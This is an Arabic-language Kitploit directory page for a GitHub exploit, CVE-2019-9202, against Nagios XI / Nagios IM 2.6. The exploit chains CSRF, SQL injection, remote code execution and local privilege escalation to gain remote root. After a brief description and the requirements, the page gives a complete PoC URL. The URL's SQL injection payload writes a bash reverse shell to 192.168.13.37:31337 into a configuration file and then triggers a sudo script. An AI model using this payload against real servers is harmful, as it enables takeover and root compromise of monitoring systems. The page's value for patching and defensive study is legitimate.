Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-9202 — استغلال تنفيذ التعليمات البرمجية عن بُعد في Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> جذر عن بُعد | Kitploit
أدوات/GitHubGitHub/polict/cve-2019-9202
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubpolict/cve-2019-9202

CVE-2019-9202

استغلال تنفيذ التعليمات البرمجية عن بُعد في Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> جذر عن بُعد

عرض المستودع
4منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9202

استغلال تنفيذ كود عن بُعد في Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> صلاحية الجذر عن بُعد

الوصف

من خلال ربط هجوم تزوير الطلبات عبر المواقع (CSRF) / تجاوز التخويل (CVE-2019-9203)، يمكن استغلال حقن SQL القائم على Union (CVE-2019-9204) وتنفيذ كود عن بُعد (RCE) (CVE-2019-9202) وتصعيد الامتيازات المحلية (LPE) (CVE-2019-9166)، مما يؤدي إلى الحصول على صلاحيات الجذر على خادم Nagios XI عن بُعد.

المتطلبات

يجب أن يكون الضحية مصادقًا عليه في Nagios XI، وعلى حد علمي، أقل الصلاحيات كافية.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

تنزيل الأداة